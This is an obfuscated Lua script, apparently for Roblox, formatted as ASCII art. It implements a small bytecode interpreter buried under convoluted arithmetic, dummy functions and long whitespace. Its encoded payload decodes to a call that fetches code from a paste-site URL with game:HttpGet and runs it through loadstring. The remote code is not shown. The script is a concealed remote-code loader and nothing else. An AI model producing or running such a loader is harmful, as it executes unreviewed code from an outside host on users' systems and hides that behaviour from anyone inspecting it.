                                                                                 local v0=tonumber;    
                                                                        local v1=string.byte;local v2=string.char;local 
                                                                     v3=string.sub;local v4=string.gsub;local v5=string.rep;local 
                                                                 v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=    
                                                            getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall 
                                                          ;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local      
                                                        function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)   
                                                      if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v83=v2(v0(v30,16));if    
                                                    v19 then local v91=v5(v83,v19);v19=nil;return v91;else return v83;end end end);local function 
                                                   v20(v31,v32,v33) if v33 then local v84=0 -0 ;local v85;while true do if (v84==(0 -0)) then v85=( 
                                                  v31/((3 -(1 + 0))^(v32-((2 -0) -1))))%((621 -(555 + 64))^(((v33-(932 -(857 + 74))) -(v32-(569 -(367 
                                                 + (1266 -(68 + 997)))))) + ((2198 -(226 + 1044)) -(214 + 713)))) ;return v85-(v85%(1 + 0)) ;end end    
                                                else local v86=0;local v87;while true do if (v86==0) then v87=(1 + 1)^(v32-(878 -(282 + 595))) ;return (( 
                                              (v31%(v87 + v87))>=v87) and (1638 -(1523 + 114))) or 0 ;end end end end local function v21() local v34=0 + 0  
                                              ;local v35;while true do if (v34==(1 + 0)) then return v35;end if (v34==(957 -(892 + 65))) then v35=v1(v16,   
                                            v18,v18);v18=v18 + (4 -(5 -2)) ;v34=118 -(32 + (155 -70)) ;end end end local function v22() local v36=350 -(87 +  
                                            263) ;local v37;local v38;while true do if (v36==1) then return (v38 * 256) + v37 ;end if (v36==(180 -(67 + (449 -  
                                          336)))) then v37,v38=v1(v16,v18,v18 + 2 + 0 );v18=v18 + (4 -2) ;v36=1 + 0 ;end end end local function v23() local v39=  
                                          952 -(802 + 150) ;local v40;local v41;local v42;local v43;while true do if (v39==1) then return (v43 * (45169940 -        
                                          28392724)) + (v42 * (118879 -53343)) + (v41 * (187 + (1256 -(1069 + 118)))) + v40 ;end if (v39==(997 -(915 + 82))) then v40 
                                          ,v41,v42,v43=v1(v16,v18,v18 + (8 -5) );v18=v18 + 3 + 1 ;v39=(2 -1) -(0 -0) ;end end end local function v24() local v44=v23( 
                                        );local v45=v23();local v46=1 + 0 ;local v47=(v20(v45,1 -0 ,20) * ((2 + (1913 -(1789 + 124)))^((2264 -1441) -((1134 -(745 + 21) 
                                        ) + 423)))) + v44 ;local v48=v20(v45,13 + 8 ,113 -82 );local v49=((   --[[==============================]]v20(v45,113 -81 )==(3 - 
                                        2)) and  -(19 -(10 + (31 -23)))) or (3 -2) ;if (v48==(442 - --[[============================================]](416 + 26))) then   
                                        if (v47==(0 -(0 + 0))) then return v49 * 0 ;else v48=1  --[[======================================================]]+ 0 ;v46=0 -0 ; 
                                      end elseif (v48==(2485 -(145 + 293))) then return ((  --[[==========================================================]]v47==(430 -(44 +  
                                      386))) and (v49 * ((1487 -(998 + 488))/(0 -0)))) or --[[==============================================================]] (v49 * NaN) ;  
                                      end return v8(v49,v48-(325 + 698) ) * (v46 + (v47/( --[[================================================================]](6 -4)^(43 + 4  
                                      + 5)))) ;end local function v25(v50) local v51=0 +  --[[==================================================================]](701 -(376 +  
                                      325)) ;local v52;local v53;while true do if (v51==( --[[==================================================================]]1058 -(87 + (     
                                    1586 -618)))) then return v6(v53);end if (v51==(4 -3) --[[====================================================================]]) then v52=v3 
                    (v16,v18,(v18 + v50) -1 );v18=v18 + v50 ;v51=2;end if ((0 + 0)==v51)  --[[====================================================================]]then v52=nil;if 
                not v50 then v50=v23();if (v50==((0 -0) -(0 + 0))) then return "";end end --[[======================================================================]] v51=(3114 -  
            1700) -(447 + 966) ;end if ((5 -3)==v51) then v53={};for v92=1818 -(1703 +    --[[======================================================================]]114) , #v52   
          do v53[v92]=v2(v1(v3(v52,v92,v92)));end v51=3;end end end local v26=v23;local   --[[======================================================================]]function v27( 
        ...) return {...},v12("#",...);end local function v28() local v54=(function()     --[[======================================================================]]return 0;end) 
        ();local v55=(function() return;end)();local v56=(function() return;end)();local  --[[======================================================================]]v57=(function 
      () return;end)();local v58=(function() return;end)();local v59=(function() return;  --[[======================================================================]]end)();local  
      v60=(function() return;end)();local v61=(function() return;end)();while true do local --[[==================================================================]] v68=(function( 
      ) return 0;end)();while true do if (v68~=(1094 -(707 + 386))) then else if (v54==2)   --[[================================================================]]then v61=(        
    function() return {};end)();for v101= #".",v60 do local v102=(function() return 0 -0 ;  --[[==============================================================]]end)();local v103 
    =(function() return;end)();local v104=(function() return;end)();local v105=(function()    --[[==========================================================]]return;end)();while 
     true do if (v102==(30 -(22 + 7))) then v105=(function() return nil;end)();while true do if --[[====================================================]] (1~=v103) then else if 
     (v104== #"!") then v105=(function() return v21()~=0 ;end)();elseif (v104==2) then v105=(     --[[==============================================]]function() return v24();  
    end)();elseif (v104== #"nil") then v105=(function() return v25();end)();end v61[v101]=(function() --[[====================================]] return v105;end)();break;end 
     if (v103==0) then local v157=(function() return 0 + 0 ;end)();local v158=(function() return;end)();  --[[========================]]while true do if (v157==(0 + 0)) then 
     v158=(function() return 0;end)();while true do if (v158~=(1986 -(1266 + 719))) then else v103=(function() return 604 -(268 + 335) ;end)();break;end if ((290 -(60 +    
  230))~=v158) then else v104=(function() return v21();end)();v105=(function() return nil;end)();v158=(function() return 1;end)();end end break;end end end end break;end 
   if ((572 -(426 + 146))~=v102) then else v103=(function() return 0;end)();v104=(function() return nil;end)();v102=(function() return 1 + 0 ;end)();end end end v59[ # 
  "91("]=(function() return v21();end)();v54=(function() return 1459 -(282 + 1174) ;end)();end if (0==v54) then local v99=(function() return 811 -(569 + 242) ;end)();    
  while true do if (v99==1) then v57=(function() return {};end)();v54=(function() return 1;end)();break;end if (v99~=(0 -0)) then else v55=(function() return function(   
  v144,v145,v146) local v147=(function() return 0 + 0 ;end)();local v148=(function() return;end)();while true do if ((1024 -(706 + 318))==v147) then v148=(function()     
  return 1251 -(721 + 530) ;end)();while true do if (v148==(1271 -(945 + 326))) then v144[v145-#"." ]=(function() return v146();end)();return v144,v145,v146;end end      
  break;end end end;end)();v56=(function() return {};end)();v99=(function() return 2 -1 ;end)();end end end break;end if (v68==(0 + 0)) then if (v54==(703 -(271 + 429))) 
   then for v106= #".",v23() do local v107=(function() return v21();end)();if (v20(v107, #"]", #"|")~=0) then else local v109=(function() return 0;end)();local v110=(    
  function() return;end)();local v111=(function() return;end)();local v112=(function() return;end)();local v113=(function() return;end)();while true do if (v109~=(2 + 0) 
  ) then else while true do if (v110~=(1502 -(1408 + 92))) then else local v168=(function() return 1086 -(461 + 625) ;end)();local v169=(function() return;end)();while   
  true do if (v168==0) then v169=(function() return 0;end)();while true do if ((1288 -(993 + 295))~=v169) then else if (v20(v112, #".", #"[")== #"<") then v113[1 + 1 ]=( 
  function() return v61[v113[1173 -(418 + 753) ]];end)();end if (v20(v112,1 + 1 ,1 + 1 )== #".") then v113[ #"gha"]=(function() return v61[v113[ #"xnx"]];end)();end v169=( 
  function() return 1 + 0 ;end)();end if (v169==1) then v110=(function() return  #"-19";end)();break;end end break;end end end if ( #","~=v110) then else local v170=(      
  function() return 0 + 0 ;end)();local v171=(function() return;end)();while true do if (v170==0) then v171=(function() return 0;end)();while true do if (v171~=0) then     
  else v113=(function() return {v22(),v22(),nil,nil};end)();if (v111==(1769 -(1749 + 20))) then local v179=(function() return 0;end)();local v180=(function() return;end)() 
  ;while true do if (v179~=0) then else v180=(function() return 0;end)();while true do if (v180==0) then v113[ #"91("]=(function() return v22();end)();v113[ #"http"]=(     
  function() return v22();end)();break;end end break;end end elseif (v111== #"|") then v113[ #"-19"]=(function() return v23();end)();elseif (v111==2) then v113[ #"91("]=(  
  function() return v23() -((1 + 1)^16) ;end)();elseif (v111== #"91(") then local v185=(function() return 1322 -(1249 + 73) ;end)();local v186=(function() return;end)();   
  while true do if (v185==(0 + 0)) then v186=(function() return 0;end)();while true do if (v186==0) then v113[ #"19("]=(function() return v23() -((1147 -(466 + 679))^(38 - 
  22)) ;end)();v113[ #"0313"]=(function() return v22();end)();break;end end break;end end end v171=(function() return 1;end)();end if (v171~=1) then else v110=(function()  
  return 2;end)();break;end end break;end end end if ((0 -0)~=v110) then else local v172=(function() return 0;end)();local v173=(function() return;end)();while true do if  
  (v172~=(1900 -(106 + 1794))) then else v173=(function() return 0;end)();while true do if ((1 + 0)==v173) then v110=(function() return  #"}";end)();break;end if (v173~=0) 
   then else v111=(function() return v20(v107,2, #"xxx");end)();v112=(function() return v20(v107, #"xnxx",6);end)();v173=(function() return 1;end)();end end break;end end  
  end if (v110~= #"19(") then else if (v20(v112, #"91(", #"nil")== #" ") then v113[ #"0836"]=(function() return v61[v113[ #"0313"]];end)();end v56[v106]=(function() return 
   v113;end)();break;end end break;end if (v109==0) then v110=(function() return 0 + 0 ;end)();v111=(function() return nil;end)();v109=(function() return 1;end)();end if 
   (v109==(2 -1)) then local v155=(function() return 0 -0 ;end)();while true do if (v155~=(115 -(4 + 110))) then else v109=(function() return 2;end)();break;end if (v155 
  ==(584 -(57 + 527))) then v112=(function() return nil;end)();v113=(function() return nil;end)();v155=(function() return 1;end)();end end end end end end for v108= #":" 
    ,v23() do v57,v108,v28=(function() return v55(v57,v108,v28);end)();end return v59;end if (v54==1) then local v100=(function() return 0;end)();while true do if (v100  
    ~=1) then else v60=(function() return v23();end)();v54=(function() return 1429 -(41 + 1386) ;end)();break;end if (v100==0) then v58=(function() return {};end)();v59= 
    (function() return {v56,v57,nil,v58};end)();v100=(function() return 1 + 0 ;end)();end end end v68=(function() return 1 -0 ;end)();end end end end local function v29( 
    v62,v63,v64) local v65=v62[2 -1 ];local v66=v62[2 + 0 ];local v67=v62[169 -(122 + 44) ];return function(...) local v69=v65;local v70=v66;local v71=v67;local v72=v27; 
      local v73=1 -0 ;local v74= -(3 -2);local v75={};local v76={...};local v77=v12("#",...) -(1 + 0) ;local v78={};local v79={};for v88=0 -0 ,v77 do if (v88>=v71)     
      then v75[v88-v71 ]=v76[v88 + 1 ];else v79[v88]=v76[v88 + 1 ];end end local v80=(v77-v71) + ((304 -(64 + 174)) -(30 + 12 + 23)) ;local v81;local v82;while true do 
       v81=v69[v73];v82=v81[1 + 0 ];if ((3242>=567) and (v82<=((181 + 1083) -(1043 + 214)))) then if ((v82<=(11 -8)) or (847>=1263)) then if ((v82<=((2851 -1638) -(323 
         + 889))) or (2253==1851)) then if (v82>(0 -0)) then v79[v81[582 -(361 + 219) ]]=v81[323 -(53 + 267) ];else local v116=0 + (1202 -(373 + 829)) ;local v117;     
        while true do if (v116==0) then v117=v81[415 -(15 + 398) ];v79[v117]=v79[v117](v13(v79,v117 + (983 -(18 + 964)) ,v74));break;end end end elseif ((v82>(7 -5))   
        or (2087>2372)) then do return;end else v79[v81[2 + 0 ]]={};end elseif ((v82<=(4 + 1)) or (4445<4149)) then if (v82==(854 -(20 + (1561 -(476 + 255))))) then    
          v79[v81[2]]();else local v119=0;local v120;local v121;while true do if (v119==(0 + 0)) then v120=v81[128 -(116 + 10) ];v121=v79[v81[1 + 2 ]];v119=739 -(542 
             + 196) ;end if (v119==(1 -0)) then v79[v120 + 1 + 0 ]=v121;v79[v120]=v121[v81[3 + 1 ]];break;end end end elseif ((v82>6) or (1818==85)) then v79[v81[1 + 
               1 ]]=v64[v81[7 -4 ]];else v79[v81[2]]=v64[v81[7 -4 ]];end elseif (v82<=11) then if (v82<=(1560 -(1126 + 425))) then if (v82==(413 -(118 + 287))) then  
                local v126=v81[7 -5 ];local v127=v79[v81[3]];v79[v126 + 1 ]=v127;v79[v126]=v127[v81[4]];else v79[v81[1123 -(118 + 1003) ]]=v81[8 -5 ];end elseif ((   
                  630<2127) and (v82==10)) then local v133=377 -(142 + (348 -113)) ;local v134;while true do if (v133==(0 -0)) then v134=v81[(1131 -(369 + 761)) +  
                      1 ];v79[v134]=v79[v134](v13(v79,v134 + (978 -(553 + 424)) ,v74));break;end end else v79[v81[2]]={};end elseif (v82<=(23 -10)) then if (v82>(  
                                  348 -(144 + 192))) then local v136=v81[2];local v137,v138=v72(v79[v136](v13(v79,v136 + 1 + 0 + (216 -(42 + 174)) ,v81[3 + 0 + 0 ] 
                                      )));v74=(v138 + v136) -(1 + 0 + (0 -0)) ;local v139=0 + 0 ;for v149=v136,v74 do v139=v139 + 1 + 0 ;v79[v149]=v137[v139];end   
                                      else local v140=v81[2];local v141,v142=v72(v79[v140](v13(v79,         v140 + (2 -1) ,v81[(13 -6) -4 ])));v74=(v142 + v140) -( 
                                      2 -1) ;local v143=0 + 0 ;for v152=v140,v74 do v143=v143 + (4          -3) ;v79[v152]=v141[v143];end end elseif ((v82==(767  
                                      -(239 + 514))) or (1938==2514)) then v79[v81[(1505 -(363 +            1141)) + 1 ]]();else do return;end end v73=v73 + (    
                                      1330 -(797 + 532)) ;end end;end return v29(v28(),{},v17)(...)         ;end return v15(                                      
                                                                                                                                                                  
                                                                                                                                                                  
                                                                                                                                                                
                                                                                                                                                                
                                                                                                                                                                
                                                                                                                                                              
                                                                                                                                                              
                                                                                                                                                            
                                                                                                                                                            
                                                                                                                                                          
                                                                                                                                                      
                                                                                                                                                  
                                                                                                                                          
                                                                                            
                                                                                          
                                                                                        
                                                                                  


"LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403203Q00682Q7470733A2Q2F706173746566792E612Q702F4C477549766B76682F72617700094Q000B7Q001206000100013Q001206000200023Q002008000200020003001201000400044Q000D000200044Q000A00013Q00022Q000E0001000100012Q00033Q00017Q00",v9(),...);
